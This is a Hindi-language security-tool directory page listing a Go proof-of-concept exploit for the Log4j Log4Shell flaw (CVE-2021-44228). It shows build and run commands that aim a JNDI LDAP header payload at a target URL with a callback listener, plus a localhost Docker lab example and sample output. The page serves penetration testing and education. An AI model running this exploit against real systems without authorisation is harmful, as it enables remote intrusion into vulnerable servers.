Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228 — एक सरल Log4j PoC जो Go में लिखा गया है | Kitploit
उपकरण/GitHubGitHub/sorrence/cve-2021-44228
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsorrence/cve-2021-44228

CVE-2021-44228

एक सरल Log4j PoC जो Go में लिखा गया है

रिपॉजिटरी देखें
111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228 PoC (Log4Shell)

⚠️ अस्वीकरण:
यह उपकरण केवल शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और नियंत्रित परीक्षण वातावरण के लिए है।
बिना स्पष्ट अनुमति के सिस्टम के खिलाफ इसका उपयोग करना अवैध है और पूरी तरह से उपयोगकर्ता की जिम्मेदारी है।


📌 विवरण

इस परियोजना में Apache Log4j2 (CVE-2021-44228) भेद्यता के लिए एक सरल प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण शामिल है।
PoC लक्ष्य को JNDI LDAP पेलोड के साथ एक विशेष रूप से तैयार HTTP हेडर भेजता है।
यदि लक्ष्य संवेदनशील है, तो वह निर्दिष्ट LHOST पते पर एक कॉलबैक भेजेगा।


🚀 उपयोग

1️⃣ निर्माण

root@kitploit:~
go build -o exploit exploit.go

2️⃣ चलाना

root@kitploit:~
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
  • -r → लक्ष्य URL (संवेदनशील एप्लिकेशन का एंडपॉइंट)
  • -l → आपका कॉलबैक श्रोता IP पता (PoC चलाने वाली मशीन)

🛠️ उदाहरण

प्रदान किए गए Docker संवेदनशील ऐप का उपयोग करना:

root@kitploit:~
# संवेदनशील ऐप चलाएं
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app

# शोषण चलाएं
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1

अपेक्षित आउटपुट:

root@kitploit:~
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE
टूल डाउनलोड करें